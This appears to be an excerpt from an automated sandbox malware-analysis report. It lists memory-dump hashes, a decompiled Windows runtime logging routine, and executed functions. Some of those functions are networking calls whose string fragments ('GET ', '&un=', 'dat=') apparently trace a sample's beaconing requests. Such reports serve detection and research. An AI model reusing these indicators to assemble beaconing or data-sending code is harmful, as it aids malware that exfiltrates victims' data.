                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b6aee01493c9af98b0caa1fbd81ac5b8cfd7e637eede50775b65b42b48ac1853
                                                                                                                • Instruction ID: e753e9f50a1518c6019cb204aa4cbdf2f27056831696f3cb01040d4d62a5b1e5
                                                                                                                • Opcode Fuzzy Hash: b6aee01493c9af98b0caa1fbd81ac5b8cfd7e637eede50775b65b42b48ac1853
                                                                                                                • Instruction Fuzzy Hash: A8900265331004030149A5A9460450B0445B7E6391391C015F14065D0CC66188656365
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c56f17ae192927fee59a1115c6328ae7bf2ffcc94230706576d9106088f21451
                                                                                                                • Instruction ID: 7cf0175dab6fb4c1699e69e0e3f5a63600c3f03c75d67e94120aa39be2e0d50e
                                                                                                                • Opcode Fuzzy Hash: c56f17ae192927fee59a1115c6328ae7bf2ffcc94230706576d9106088f21451
                                                                                                                • Instruction Fuzzy Hash: F790027131100C03D10861A988046860005A7E0341F51C011A6014695ED6A588917275
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 43ef813015ee18ee1f224d3cd63224f3aedfe9ea9c6a7732df41da1acde000f8
                                                                                                                • Instruction ID: 44eabc918a905e5b192d26be8bb28ad3f18c693803c569bf0ef7aef86015ebc0
                                                                                                                • Opcode Fuzzy Hash: 43ef813015ee18ee1f224d3cd63224f3aedfe9ea9c6a7732df41da1acde000f8
                                                                                                                • Instruction Fuzzy Hash: B890026171500803D14471A994187060015A7E0241F51D011A0014594DC6998A5577E5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 84f295e18a73088909f9b29bebb50ab137db6dc2b2f1d6fdb3319b119a014825
                                                                                                                • Instruction ID: f9855ea6a87e2944f8db2543aee06ca7512bf9cec2e6ce8b6da43aee6f843189
                                                                                                                • Opcode Fuzzy Hash: 84f295e18a73088909f9b29bebb50ab137db6dc2b2f1d6fdb3319b119a014825
                                                                                                                • Instruction Fuzzy Hash: 60900271311004539504A6E99804A4A4105A7F0341B51D015A4004594CC59488616265
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 679781c9573efd65d524120f9dd20a6c9f3a1ff63e549c09e526018ee400eff4
                                                                                                                • Instruction ID: fcae6725ae30b941970d872e3c1192af5bcc8cf4c129e2424458699fb0c3e6d2
                                                                                                                • Opcode Fuzzy Hash: 679781c9573efd65d524120f9dd20a6c9f3a1ff63e549c09e526018ee400eff4
                                                                                                                • Instruction Fuzzy Hash: 4190027131100803D10461A995087070005A7E0241F51D411A0414598DD69688517265
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8d5e009d3cd0b5c6eaf9378496a698c2967ee8bde38e35c035652999cc83e56c
                                                                                                                • Instruction ID: e4473885bdfce26e665148d878b0a3c52530828023e6d85eac06fe4dd8b6c7b6
                                                                                                                • Opcode Fuzzy Hash: 8d5e009d3cd0b5c6eaf9378496a698c2967ee8bde38e35c035652999cc83e56c
                                                                                                                • Instruction Fuzzy Hash: 8490027531504843D50465A99804A870005A7E0345F51D411A04145DCDC6948861B265
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 556f2242bd64e68ba0de30b8e64bf5093e34daf7866774b925a124a457516800
                                                                                                                • Instruction ID: 607398b2cde4261f751cfa95df18658252414ab62bf979482d2ba8a2d8aa4460
                                                                                                                • Opcode Fuzzy Hash: 556f2242bd64e68ba0de30b8e64bf5093e34daf7866774b925a124a457516800
                                                                                                                • Instruction Fuzzy Hash: CE90026131504843D10465A99408A060005A7E0245F51D011A10545D5DC6758851B275
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: db5e5058b109395010fb2aa86e5ec46d8c8454160d4ba621629ab8713e666a44
                                                                                                                • Instruction ID: e9bf1b5575fe246d6aa35cd4f49db89a5777089467efc29aff7c9268209a54c8
                                                                                                                • Opcode Fuzzy Hash: db5e5058b109395010fb2aa86e5ec46d8c8454160d4ba621629ab8713e666a44
                                                                                                                • Instruction Fuzzy Hash: 9F90027132114803D11461A9C4047060005A7E1241F51C411A0814598DC6D588917266
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5b52f6c111d67593e4ad1ff3057fb0f6dd75a651d8624e11c60012cef8ec3510
                                                                                                                • Instruction ID: e43ecb3685530caa43d5e2fb31062d116efc6eaf52e496bbcee4b29c676f0ab7
                                                                                                                • Opcode Fuzzy Hash: 5b52f6c111d67593e4ad1ff3057fb0f6dd75a651d8624e11c60012cef8ec3510
                                                                                                                • Instruction Fuzzy Hash: A690027171500C03D15471A984147460005A7E0341F51C011A0014694DC7958A5577E5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cafc6a1d3c0546ae384004b736532b94361641df873c537ed72e0aa232763ac1
                                                                                                                • Instruction ID: ded07c4d42f7a2f989b96cc1dc89d444d0a7829a6f07f021fbe2747b812a2abb
                                                                                                                • Opcode Fuzzy Hash: cafc6a1d3c0546ae384004b736532b94361641df873c537ed72e0aa232763ac1
                                                                                                                • Instruction Fuzzy Hash: 2D90027131504C43D14471A98404A460015A7E0345F51C011A00546D4DD6658D55B7A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e0a1a093573f430bf60b475dbd21673ff1c2ab5e3a9ffa0facf5749e0bc0372a
                                                                                                                • Instruction ID: 3e7718c0d89cb804fa5212226b1e9685f07a3b3c29714d0516db79dd3476de0d
                                                                                                                • Opcode Fuzzy Hash: e0a1a093573f430bf60b475dbd21673ff1c2ab5e3a9ffa0facf5749e0bc0372a
                                                                                                                • Instruction Fuzzy Hash: 1190027131100C43D10461A98404B460005A7F0341F51C016A0114694DC655C8517665
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                • Instruction ID: 34cd7fe7305ffc5b0ea7c027525731c456b5501dd8243def6266b843b3c66593
                                                                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 53%
                                                                                                                			E0128FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                                                				void* _t7;
                                                                                                                				intOrPtr _t9;
                                                                                                                				intOrPtr _t10;
                                                                                                                				intOrPtr* _t12;
                                                                                                                				intOrPtr* _t13;
                                                                                                                				intOrPtr _t14;
                                                                                                                				intOrPtr* _t15;
                                                                                                                
                                                                                                                				_t13 = __edx;
                                                                                                                				_push(_a4);
                                                                                                                				_t14 =  *[fs:0x18];
                                                                                                                				_t15 = _t12;
                                                                                                                				_t7 = E0123CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                                                				_push(_t13);
                                                                                                                				E01285720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                                                				_t9 =  *_t15;
                                                                                                                				if(_t9 == 0xffffffff) {
                                                                                                                					_t10 = 0;
                                                                                                                				} else {
                                                                                                                					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                                                				}
                                                                                                                				_push(_t10);
                                                                                                                				_push(_t15);
                                                                                                                				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                                                				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                                                				return E01285720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0128FDFA
                                                                                                                Strings
                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0128FE2B
                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0128FE01
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                • API String ID: 885266447-3903918235
                                                                                                                • Opcode ID: 5defff4eef130f71e45086d412aa001a3b285fee44009b7b610df679a3075f75
                                                                                                                • Instruction ID: 065aef102f4bbb02ca427a0d30b0395a288e00eb171473e1507fd6deb48c5d8b
                                                                                                                • Opcode Fuzzy Hash: 5defff4eef130f71e45086d412aa001a3b285fee44009b7b610df679a3075f75
                                                                                                                • Instruction Fuzzy Hash: E2F0F672210602BFEB282A86DC06F33BF5AEB44B30F144315F628561D1DBA2F87086F0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Executed Functions

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.497279892.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: getaddrinforecvsetsockopt
                                                                                                                • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                • API String ID: 1564272048-1117930895
                                                                                                                • Opcode ID: 6b29d3a9b8a0855173d04c797727fd6868756e6b291ffe8281b58d39a5f42485
                                                                                                                • Instruction ID: 6b02a1ee4a5eb03031da0365bc7581877a8e23d4380c32c5c54cbbb022d67903
                                                                                                                • Opcode Fuzzy Hash: 6b29d3a9b8a0855173d04c797727fd6868756e6b291ffe8281b58d39a5f42485
                                                                                                                • Instruction Fuzzy Hash: B3525F30618B088BC7A9EB68D8947EDB7E1FBA4310F54452ED4ABC7186EF70A545CB81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.497279892.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseCreateRead
                                                                                                                • String ID: `
                                                                                                                • API String ID: 1419693385-2679148245
                                                                                                                • Opcode ID: 45bbae7e767650f39c1c953f00b072806357b07c5915991ab877e7873310bcd2
                                                                                                                • Instruction ID: dc4d3f1891b85822a8450ace0c4253f3138c9324650b3d9ef90bba02b9999362
                                                                                                                • Opcode Fuzzy Hash: 45bbae7e767650f39c1c953f00b072806357b07c5915991ab877e7873310bcd2
                                                                                                                • Instruction Fuzzy Hash: F9224D70A18A099FCB99DF28C4957AEF7E2FBA8311F40462EE45ED3650DB30E551CB81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.497279892.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: closesocket
                                                                                                                • String ID: clos$esoc$ket
                                                                                                                • API String ID: 2781271927-3604069445
                                                                                                                • Opcode ID: 4144c9b076020b5d18526d503d7d8c3c92f9ff16a9e0cf4144f221806cac682d
                                                                                                                • Instruction ID: 8dd83fad9c71f8efee38814f513e0301b319b55a116354d72ee7a4922cc302bc
                                                                                                                • Opcode Fuzzy Hash: 4144c9b076020b5d18526d503d7d8c3c92f9ff16a9e0cf4144f221806cac682d
                                                                                                                • Instruction Fuzzy Hash: 5DF03A7021CB089BCB84EF189489BAAB7E0FB99315F54066DE85ECB245C77586428B47
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.497279892.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: closesocket
                                                                                                                • String ID: clos$esoc$ket
                                                                                                                • API String ID: 2781271927-3604069445
                                                                                                                • Opcode ID: 24c39bc4845c5401fa2dca815a246fa826a042ab8a355e13ed83dec9282e93cd
                                                                                                                • Instruction ID: 57280e24943df8b4fcbcf3b2efe784ca8b4abce88260803f2c40aa41f93ae325
                                                                                                                • Opcode Fuzzy Hash: 24c39bc4845c5401fa2dca815a246fa826a042ab8a355e13ed83dec9282e93cd
                                                                                                                • Instruction Fuzzy Hash: 79F0177061CB089FCB84EF18D488B6AB6E0FB99354F54466DA45ECB245C7758A428B42
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.497279892.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: connect
                                                                                                                • String ID: conn$ect
                                                                                                                • API String ID: 1959786783-716201944
                                                                                                                • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                • Instruction ID: 3a35f61b07c5b05ddfe1211cce3d561f28156ef52d0a6e7fc3e814ab9409c13f
                                                                                                                • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                • Instruction Fuzzy Hash: 9701E170618A0C8FCBD4EF5CE448B5577E0EB59315F1545AED90DCB266C774C9818BC2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.497279892.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: connect
                                                                                                                • String ID: conn$ect
                                                                                                                • API String ID: 1959786783-716201944
                                                                                                                • Opcode ID: e4b8985f9adc47d49ee37ea67832eb57cf2024d6bae2179db61ac7262cb99304
                                                                                                                • Instruction ID: 75c3ee1f0e88b9c533daeb5c0cded95659ede4ec29631ee8f5511965ead966f3
                                                                                                                • Opcode Fuzzy Hash: e4b8985f9adc47d49ee37ea67832eb57cf2024d6bae2179db61ac7262cb99304
                                                                                                                • Instruction Fuzzy Hash: E7012170618A0C8FCB94EF5CD488B54BBE0EB99325F1541AED84DCB266C774C9858BC1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.497279892.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: send
                                                                                                                • String ID: send
                                                                                                                • API String ID: 2809346765-2809346765
                                                                                                                • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                • Instruction ID: 104a042ca805cad9d8df90e7084c86ac9d88ebaf3e5f84e7e37b94a3cdf382aa
                                                                                                                • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                • Instruction Fuzzy Hash: A7011270518A0C8FDBC4EF1CD448B1577E0EBAC315F1545AE985DCB266C670D9818B81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.497279892.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: socket
                                                                                                                • String ID: sock
                                                                                                                • API String ID: 98920635-2415254727
                                                                                                                • Opcode ID: 492921c7a6c651628f697892ead3c4d1433c0312c824eedce86bc82d59284046
                                                                                                                • Instruction ID: ff86cf9437f3bcc7cfe4706e3dc743980c3e60753d824113d32b94acb6ed4c68
                                                                                                                • Opcode Fuzzy Hash: 492921c7a6c651628f697892ead3c4d1433c0312c824eedce86bc82d59284046
                                                                                                                • Instruction Fuzzy Hash: B90184706186088FCB84EF5CD448B54BBE0FB59314F1545ADD45DDB336C7B0C9818B86
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.497279892.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: socket
                                                                                                                • String ID: sock
                                                                                                                • API String ID: 98920635-2415254727
                                                                                                                • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                • Instruction ID: d719a1b27a409168d289a4735bfc0668a7425b10337121fb24b73666dc436d02
                                                                                                                • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                • Instruction Fuzzy Hash: AD0121706186188FCB84EF5CD048B54BBE0FB59314F1545ADD45DDB266C7B0C9818B86
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.497279892.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 3472027048-0
                                                                                                                • Opcode ID: 89e68823b88dd7943186ea2ef901c253fc527279e89cfd0e2dd32652b3228245
                                                                                                                • Instruction ID: ba2f0f765878bf7e6c1e6d6bb8bf927d0f9056c02862af5fd6ec78a1104e5e37
                                                                                                                • Opcode Fuzzy Hash: 89e68823b88dd7943186ea2ef901c253fc527279e89cfd0e2dd32652b3228245
                                                                                                                • Instruction Fuzzy Hash: 22314B74A08B49DFDBA4EF6980882E9B7A1FB94300F54527EC92DCA612CB349554CFD1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.497279892.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: closesocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 2781271927-0
                                                                                                                • Opcode ID: e96d3ad00266d852a7a19c2bf0630f6ffdc445d47fc8afbda49bf0d0bcd512aa
                                                                                                                • Instruction ID: 64fdb4a2ba2bcf1864feb02be424d9de4c9ffbd203d1a1c66819abb89398ff31
                                                                                                                • Opcode Fuzzy Hash: e96d3ad00266d852a7a19c2bf0630f6ffdc445d47fc8afbda49bf0d0bcd512aa
                                                                                                                • Instruction Fuzzy Hash: 50D05E3420C7484FEF84EF68A05A7AD77E1FBD8312F09096DD85FCB246CB6646818756
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Executed Functions

                                                                                                                APIs
                                                                                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,02B24B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02B24B97,007A002E,00000000,00000060,00000000,00000000), ref: 02B29F8D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID: .z`
                                                                                                                • API String ID: 823142352-1441809116
                                                                                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                • Instruction ID: 08d342a3b1ca3939b4a7b158f9fd02793c1181e9adca319ad52dae980bd0c32d
                                                                                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                • Instruction Fuzzy Hash: 02F0B2B2200208ABCB08CF88DC94EEB77ADAF8C754F158248BA0D97240C630E811CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • NtReadFile.NTDLL(02B24D52,5EB6522D,FFFFFFFF,02B24A11,?,?,02B24D52,?,02B24A11,FFFFFFFF,5EB6522D,02B24D52,?,00000000), ref: 02B2A035
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 2738559852-0
                                                                                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                • Instruction ID: 5e79bbaa7baa1ae55245b366ab83a2f2d7a247c4011d49bef2b26426a065609d
                                                                                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                • Instruction Fuzzy Hash: 3DF0B7B2200208AFCB14DF89DC94EEB77ADEF8C754F158248BE1D97241D630E811CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02B12D11,00002000,00003000,00000004), ref: 02B2A159
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2167126740-0
                                                                                                                • Opcode ID: d4db3ab8b9fb2eca9c067398f90bc36ec5ddf20bffa69048124fdb0b8337412c
                                                                                                                • Instruction ID: 73d66b5c61baecf33933aae77c65d4a521ec94842219c030ab10de35dfc6ba38
                                                                                                                • Opcode Fuzzy Hash: d4db3ab8b9fb2eca9c067398f90bc36ec5ddf20bffa69048124fdb0b8337412c
                                                                                                                • Instruction Fuzzy Hash: E0F0A0B5110189AFDB14DF98DC84CE7B7ADFF88214B14869DF94D97202C234D855CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02B12D11,00002000,00003000,00000004), ref: 02B2A159
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2167126740-0
                                                                                                                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                • Instruction ID: 5d9b1cb463a907057681d03aa50ed74a1a5489cce0381cdf7a7c0001bdd8aa52
                                                                                                                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                • Instruction Fuzzy Hash: 59F015B2200218ABCB14DF89CC90EAB77ADAF88750F118148BE0897241C630F810CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • NtClose.NTDLL(02B24D30,?,?,02B24D30,00000000,FFFFFFFF), ref: 02B2A095
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 3535843008-0
                                                                                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                • Instruction ID: 0291b3d16fcceefc04b952d302483b302e231f74b0d0730c2b6014dee2d1e65e
                                                                                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                • Instruction Fuzzy Hash: 69D01776200314ABD710EB98CC89FA7BBADEF48760F154499BA1C9B242C530FA008AE0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • NtClose.NTDLL(02B24D30,?,?,02B24D30,00000000,FFFFFFFF), ref: 02B2A095
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 3535843008-0
                                                                                                                • Opcode ID: ffd8d53e8eb56800d75bc2eea86395ddc74a38793fb87e0d628d595c1ac996ad
                                                                                                                • Instruction ID: 2a1b391eab93e7f7d74add3ca92beca5f4be91a9712a83740cb399fcdf875220
                                                                                                                • Opcode Fuzzy Hash: ffd8d53e8eb56800d75bc2eea86395ddc74a38793fb87e0d628d595c1ac996ad
                                                                                                                • Instruction Fuzzy Hash: DAE0EC75200214ABD710EB98CC89E97776DEB48750F154599BA189B282C534F9008BD0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 2fbb3bea804fda819ef2aa364b8e2a2ff9d63bd8d83fc8cbb1cda8fc1a9a4137
                                                                                                                • Instruction ID: 405f19e941f930404b71fdcc5d629eb717772dcdb1f66c308ebfd30cfccc3382
